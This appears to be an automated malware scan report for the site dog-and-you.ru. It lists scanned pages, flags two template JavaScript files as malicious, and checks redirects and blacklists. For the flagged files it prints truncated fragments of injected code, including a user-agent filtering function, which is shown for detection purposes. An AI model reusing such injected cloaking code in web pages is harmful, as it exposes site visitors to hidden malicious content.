Scanned pages/files
Request | Server response | Status |
http://www.dog-and-you.ru/ | 200 OK Content-Length: 29275 Content-Type: text/html | clean |
http://www.dog-and-you.ru/templates/gk_postnote/js/domready_fix.js | 200 OK Content-Length: 6588 Content-Type: text/javascript | clean |
http://www.dog-and-you.ru/media/system/js/caption.js | 200 OK Content-Length: 7283 Content-Type: text/javascript | clean |
http://www.dog-and-you.ru/templates/gk_postnote/js/gk.script.js | 200 OK Content-Length: 17101 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (n_haystack, n_needle, n_offset) { var haystack = (n_haystack + '').toLowerCase(); var needle = (n_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, n_offset)) !== -1) { return index; } return false; } function uuu_agent_ch(){ var badAgent = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant','Chromium',' container.className = container.className + " " + align; container.setAttribute("style","float:"+align); if (!docMode|| docMode < 8) { container.style.width = width + "px"; } } } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.dog-and-you.ru/templates/gk_postnote/js/menu/mega.js | 200 OK Content-Length: 23082 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (n_haystack, n_needle, n_offset) { var haystack = (n_haystack + '').toLowerCase(); var needle = (n_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, n_offset)) !== -1) { return index; } return false; } function uuu_agent_ch(){ var badAgent = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant','Chromium',' return true; }, disableTooltip: function (el) { if (this.options.tips) this.tooltips.disableTip(el); return; }, enableTooltip: function (el) { if (this.options.tips) this.tooltips.enableTip(el); return; } }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://www.dog-and-you.ru/where-they-sell-books | 200 OK Content-Length: 14792 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bookroom.ru 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru"> <head> <base href="http://dog-and-you.ru/"> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Genioloci" /> <meta name="descripti ...[4460 bytes skipped]... | ||
http://www.dog-and-you.ru/shop | 200 OK Content-Length: 20946 Content-Type: text/html | clean |
http://www.dog-and-you.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja-zeolite&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 404 Not Found Content-Length: 591 Content-Type: text/html | clean |
http://www.dog-and-you.ru/test404page.js | 404 Not Found Content-Length: 591 Content-Type: text/html | clean |
http://www.dog-and-you.ru/partners | 200 OK Content-Length: 6708 Content-Type: text/html | clean |
http://www.dog-and-you.ru/contacts | 200 OK Content-Length: 8660 Content-Type: text/html | clean |
http://www.dog-and-you.ru/component/content/article/75 | 200 OK Content-Length: 12090 Content-Type: text/html | clean |
http://www.dog-and-you.ru/shop?page=shop.product_details&flypage=flypage-ask.tpl&product_id=9&category_id=1 | 200 OK Content-Length: 8586 Content-Type: text/html | clean |
http://www.dog-and-you.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja-zeolite&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js | 404 Not Found Content-Length: 591 Content-Type: text/html | clean |
http://www.dog-and-you.ru/component/content/article/89 | 200 OK Content-Length: 14787 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dog-and-you.ru
Result:
GET / HTTP/1.1
Host: dog-and-you.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: dog-and-you.ru
Referer: http://www.google.com/search?q=dog-and-you.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dog-and-you.ru
Referer: http://www.google.com/search?q=dog-and-you.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dog-and-you.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dog-and-you.ru/
Result: dog-and-you.ru is not infected or malware details are not published yet.
Result: dog-and-you.ru is not infected or malware details are not published yet.